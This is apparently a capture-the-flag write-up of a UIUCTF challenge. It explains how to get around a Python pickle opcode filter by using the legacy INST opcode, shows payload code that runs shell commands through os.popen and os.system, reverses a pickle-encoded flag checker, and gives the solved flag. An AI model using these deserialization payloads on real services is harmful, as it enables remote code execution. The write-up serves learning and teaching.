The main challenge file is quite short, as follows:
import pickle
import base64
import sys
import pickletools
def check_flag(flag_guess: str):
"""REDACTED FOR PRIVACY"""
cucumber = base64.b64decode(input("Give me your best pickle (base64 encoded) to taste! "))
for opcode, _, _ in pickletools.genops(cucumber):
if opcode.code == "c" or opcode.code == "\x93":
print("Eww! I can't eat dill pickles.")
sys.exit(0)
pickle.loads(cucumber)
It is clear that the challenge is about exploiting pickle deserialization. Pickles are python objects serialized into a series of bytecode instructions, and by executing the same bytecode the same python object can be reconstructed elsewhere. Since we're control the pickle that's loaded, we can pretty much execute arbitrary python code, and a quick google search will reveal many possible payloads. Here is an example:
import pickle, os, base64 class P(object): def __reduce__(self): return (os.system, ("ls -l",)) p = pickle.dumps(P()) print(base64.b64encode(p))
t.py
We can disassemble the bytecode using the picketools module:
import pickletools ... print(pickletools.dis(p))
t.py
The result is as follows:
0: \x80 PROTO 4
2: \x95 FRAME 32
11: \x8c SHORT_BINUNICODE 'posix'
18: \x94 MEMOIZE (as 0)
19: \x8c SHORT_BINUNICODE 'system'
27: \x94 MEMOIZE (as 1)
28: \x93 STACK_GLOBAL
29: \x94 MEMOIZE (as 2)
30: \x8c SHORT_BINUNICODE 'ls -l'
37: \x94 MEMOIZE (as 3)
38: \x85 TUPLE1
39: \x94 MEMOIZE (as 4)
40: R REDUCE
41: \x94 MEMOIZE (as 5)
42: . STOP
highest protocol among opcodes = 4
However, in the context of the challenge we’re not allowed to use the c
and \x93
operations. Looking up the full list of opcodes on github, we see that these correspond to the GLOBAL
and STACK_GLOBAL
operations. These operations are what allow us access to the execution context and to import modules, so without them we cannot access any builtin functions or classes.
I checked through the list of opcodes to see if any could be useful, and also read through the pickletools source code where each opcode was well documented. I also looked through the genops
function, hoping to find some inconsistencies in the way opcodes were generated compared to how they were evaluated, but there was nothing. I also explored the possibility that there might be inconsistencies across different pickle protocol versions, but it seems to be handled perfectly with backwards compatibility.
Eventually, while looking through how each opcode was implemented I saw the load_inst
function:
... def load_inst(self): module = self.readline()[:-1].decode("ascii") name = self.readline()[:-1].decode("ascii") klass = self.find_class(module, name) self._instantiate(klass, self.pop_mark()) ...
pickle.py
It caught my eye because it called the find_class
method used to import stuff from a module, and it's also used by GLOBAL
and STACK_GLOBAL
. Referring back to its documentation in pickletools basically describes INST
as an older opcode which is now replaced by the GLOBAL
and OBJ
opcodes.
INST is followed by two newline-terminated strings, giving a
module and class name ... self.find_class(module, name) is used
to get a class object.
In addition, all the objects on the stack following the topmost
markobject are gathered into a tuple and popped (along with the
topmost markobject), just as for the TUPLE opcode.
So we can use inst to load whatever function we need and gain arbitrary code execution from there!
Now to craft the payload. My first thought was to call something like __import__("os").popen("<command>").read()
. First, we call inst with os
as module name, popen
as the 'class name', and <command>
as the argument. Second, we have to load the getattr
function to access the read
method. Finally, we add an empty tuple on the stack (since there are no arguments) and invoke the read method using the REDUCE
opcode.
from pickle import * import base64 p = PROTO + b'\x04' p += MARK p += MARK p += MARK p += STRING + b'"cat chal.py"\n' p += INST + b'os\npopen\n' p += STRING + b'"read"\n' p += INST + b'builtins\ngetattr\n' p += MARK p += TUPLE p += REDUCE p += INST + b'builtins\nprint\n' p += STOP print(base64.b64encode(p))
s.py
Initially, I submitted the payload with ls
as the command, however, seeing no flag.txt
file I output the chal.py
contents instead, and it is as follows:
import pickle import base64 import sys import pickletools def check_flag(flag_guess: str): """REDACTED FOR PRIVACY""" # What?! How did you find this? Well you won't be able to figure it out from here... return pickle.loads(b'\x80\x04\x96+\x00\x00\x00\x00\x00\x00\x00lbp`sg~S:_p\x7fnf\x81yJ\x8bzP\x92\x95\x8cr\x88\x9d\x90\x8c\x7fb\x96\xa0\xa3\x9e\xae^\xa4s\xa5\xa6y}\xc8\x94\x8c' + len(flag_guess).to_bytes(1, 'little') + flag_guess.encode() + b'\x94\x8c\x08builtins\x8c\x03all\x93\x94\x94\x8c\x08builtins\x8c\x04list\x93\x94\x94\x8c\x08builtins\x8c\x03map\x93\x94\x94\x8c\x05types\x8c\x08CodeType\x93\x94(K\x01K\x00K\x00K\x01K\x05KCC<|\x00d\x01\x19\x00t\x00t\x01\x83\x01k\x00o:|\x00d\x02\x19\x00t\x02t\x01|\x00d\x01\x19\x00\x19\x00\x83\x01d\x03|\x00d\x01\x19\x00d\x04\x17\x00\x14\x00\x17\x00d\x05\x16\x00k\x02S\x00(NK\x00K\x01K\x02KaK\xcbt\x8c\x03len\x8c\x01b\x8c\x03ord\x87\x8c\x01x\x85\x8c\x08<pickle>\x8c\x08<pickle>K\x07C\x00tR\x940\x8c\x05types\x8c\x0cFunctionType\x93\x94(h\t}(\x8c\x03len\x8c\x08builtins\x8c\x03len\x93\x94\x94\x8c\x01bh\x01\x8c\x03ord\x8c\x08builtins\x8c\x03ord\x93\x94\x94uN)tR\x8c\x08builtins\x8c\tenumerate\x93\x94\x94h\x00\x85R\x86R\x85R\x85R.') cucumber = base64.b64decode(input("Give me your best pickle (base64 encoded) to taste! ")) for opcode, _, _ in pickletools.genops(cucumber): if opcode.code == "c" or opcode.code == "\x93": print("Eww! I can't eat dill pickles.") sys.exit(0) pickle.loads(cucumber)
chal.py
So it seems that there is a second part to this challenge - reversing some pickle bytecode. I disassembled it with pickletools.dis and this was the result:
0: \x80 PROTO 4
2: \x96 BYTEARRAY8 bytearray(b'lbp`sg~S:_p\x7fnf\x81yJ\x8bzP\x92\x95\x8cr\x88\x9d\x90\x8c\x7fb\x96\xa0\xa3\x9e\xae^\xa4s\xa5\xa6y}\xc8')
54: \x94 MEMOIZE (as 0)
55: \x8c SHORT_BINUNICODE 'uiuctf{guess}'
70: \x94 MEMOIZE (as 1)
71: \x8c SHORT_BINUNICODE 'builtins'
81: \x8c SHORT_BINUNICODE 'all'
86: \x93 STACK_GLOBAL
87: \x94 MEMOIZE (as 2)
88: \x94 MEMOIZE (as 3)
89: \x8c SHORT_BINUNICODE 'builtins'
99: \x8c SHORT_BINUNICODE 'list'
105: \x93 STACK_GLOBAL
106: \x94 MEMOIZE (as 4)
107: \x94 MEMOIZE (as 5)
108: \x8c SHORT_BINUNICODE 'builtins'
118: \x8c SHORT_BINUNICODE 'map'
123: \x93 STACK_GLOBAL
124: \x94 MEMOIZE (as 6)
125: \x94 MEMOIZE (as 7)
126: \x8c SHORT_BINUNICODE 'types'
133: \x8c SHORT_BINUNICODE 'CodeType'
143: \x93 STACK_GLOBAL
144: \x94 MEMOIZE (as 8)
145: ( MARK
146: K BININT1 1
148: K BININT1 0
150: K BININT1 0
152: K BININT1 1
154: K BININT1 5
156: K BININT1 67
158: C SHORT_BINBYTES b'|\x00d\x01\x19\x00t\x00t\x01\x83\x01k\x00o:|\x00d\x02\x19\x00t\x02t\x01|\x00d\x01\x19\x00\x19\x00\x83\x01d\x03|\x00d\x01\x19\x00d\x04\x17\x00\x14\x00\x17\x00d\x05\x16\x00k\x02S\x00'
220: ( MARK
221: N NONE
222: K BININT1 0
224: K BININT1 1
226: K BININT1 2
228: K BININT1 97
230: K BININT1 203
232: t TUPLE (MARK at 220)
233: \x8c SHORT_BINUNICODE 'len'
238: \x8c SHORT_BINUNICODE 'b'
241: \x8c SHORT_BINUNICODE 'ord'
246: \x87 TUPLE3
247: \x8c SHORT_BINUNICODE 'x'
250: \x85 TUPLE1
251: \x8c SHORT_BINUNICODE '<pickle>'
261: \x8c SHORT_BINUNICODE '<pickle>'
271: K BININT1 7
273: C SHORT_BINBYTES b''
275: t TUPLE (MARK at 145)
276: R REDUCE
277: \x94 MEMOIZE (as 9)
278: 0 POP
279: \x8c SHORT_BINUNICODE 'types'
286: \x8c SHORT_BINUNICODE 'FunctionType'
300: \x93 STACK_GLOBAL
301: \x94 MEMOIZE (as 10)
302: ( MARK
303: h BINGET 9
305: } EMPTY_DICT
306: ( MARK
307: \x8c SHORT_BINUNICODE 'len'
312: \x8c SHORT_BINUNICODE 'builtins'
322: \x8c SHORT_BINUNICODE 'len'
327: \x93 STACK_GLOBAL
328: \x94 MEMOIZE (as 11)
329: \x94 MEMOIZE (as 12)
330: \x8c SHORT_BINUNICODE 'b'
333: h BINGET 1
335: \x8c SHORT_BINUNICODE 'ord'
340: \x8c SHORT_BINUNICODE 'builtins'
350: \x8c SHORT_BINUNICODE 'ord'
355: \x93 STACK_GLOBAL
356: \x94 MEMOIZE (as 13)
357: \x94 MEMOIZE (as 14)
358: u SETITEMS (MARK at 306)
359: N NONE
360: ) EMPTY_TUPLE
361: t TUPLE (MARK at 302)
362: R REDUCE
363: \x8c SHORT_BINUNICODE 'builtins'
373: \x8c SHORT_BINUNICODE 'enumerate'
384: \x93 STACK_GLOBAL
385: \x94 MEMOIZE (as 15)
386: \x94 MEMOIZE (as 16)
387: h BINGET 0
389: \x85 TUPLE1
390: R REDUCE
391: \x86 TUPLE2
392: R REDUCE
393: \x85 TUPLE1
394: R REDUCE
395: \x85 TUPLE1
396: R REDUCE
397: . STOP
It seems to be a flag checker, where the check function represented in python bytecode. I reversed the types.CodeType function call:
types.CodeType(
argcount=1,
posonlyargcount=0,
kwonlyargcount=0,
nlocals=1,
stacksize=5,
flags=67,
code=b'|\x00d\x01\x19\x00t\x00t\x01\x83\x01k\x00o:|\x00d\x02\x19\x00t\x02t\x01|\x00d\x01\x19\x00\x19\x00\x83\x01d\x03|\x00d\x01\x19\x00d\x04\x17\x00\x14\x00\x17\x00d\x05\x16\x00k\x02S\x00',
consts=(None, 0, 1, 2, 97, 203),
names=('len', 'b', 'ord'),
varnames=('x',),
filename='<pickle>',
name='<pickle>',
firstlineno=7,
lnotab=b'',
)
Now I reversed the python bytecode using the dis
module:
0 LOAD_FAST 0 (0)
2 LOAD_CONST 1 (1)
4 BINARY_SUBSCR
6 LOAD_GLOBAL 0 (0)
8 LOAD_GLOBAL 1 (1)
10 CALL_FUNCTION 1
12 COMPARE_OP 0 (<)
14 JUMP_IF_FALSE_OR_POP 58 (to 116)
16 LOAD_FAST 0 (0)
18 LOAD_CONST 2 (2)
20 BINARY_SUBSCR
22 LOAD_GLOBAL 2 (2)
24 LOAD_GLOBAL 1 (1)
26 LOAD_FAST 0 (0)
28 LOAD_CONST 1 (1)
30 BINARY_SUBSCR
32 BINARY_SUBSCR
34 CALL_FUNCTION 1
36 LOAD_CONST 3 (3)
38 LOAD_FAST 0 (0)
40 LOAD_CONST 1 (1)
42 BINARY_SUBSCR
44 LOAD_CONST 4 (4)
46 BINARY_ADD
48 BINARY_MULTIPLY
50 BINARY_ADD
52 LOAD_CONST 5 (5)
54 BINARY_MODULO
56 COMPARE_OP 2 (==)
58 RETURN_VALUE
So decompiling by hand, this function roughly corresponds to the following:
def f(x):
if x[0] < len(b):
return x[1] == (ord(b[x[0]]) + 2 * (x[0] + 97)) % 203
I then decompiled the rest of the pickle bytecode by hand and this was the result:
for i, c in enumerate(b'lbp`sg~S:_p\x7fnf\x81yJ\x8bzP\x92\x95\x8cr\x88\x9d\x90\x8c\x7fb\x96\xa0\xa3\x9e\xae^\xa4s\xa5\xa6y}\xc8'):
if i < len(b):
assert c == (ord(b[i]) + 2 * (i + 97)) % 203
So it's quite a straightforward flag checker, I quickly threw together the following script to solve for the flag:
flag = '' for i, c in enumerate(b'lbp`sg~S:_p\x7fnf\x81yJ\x8bzP\x92\x95\x8cr\x88\x9d\x90\x8c\x7fb\x96\xa0\xa3\x9e\xae^\xa4s\xa5\xa6y}\xc8'): j = 1 possible = '' decoded_c = c + j*203 - 2*(i+97) while decoded_c < 128: possible += chr(decoded_c) + ' ' decoded_c = c + j*203 - 2*(i+97) j += 1 flag += possible[0] print(possible) print(flag)
s2.py
This gave the flag:
uiuctf{N3Ver_Und3r_3stiMate_P1ckles!e2ba24}
Overall, the main difficulty in the challenge for me was finding the INST
opcode as the second reversing part was relatively straightforward. I learned quite a bit about pickle bytecode through this, including how frames work and the differences between protocol versions.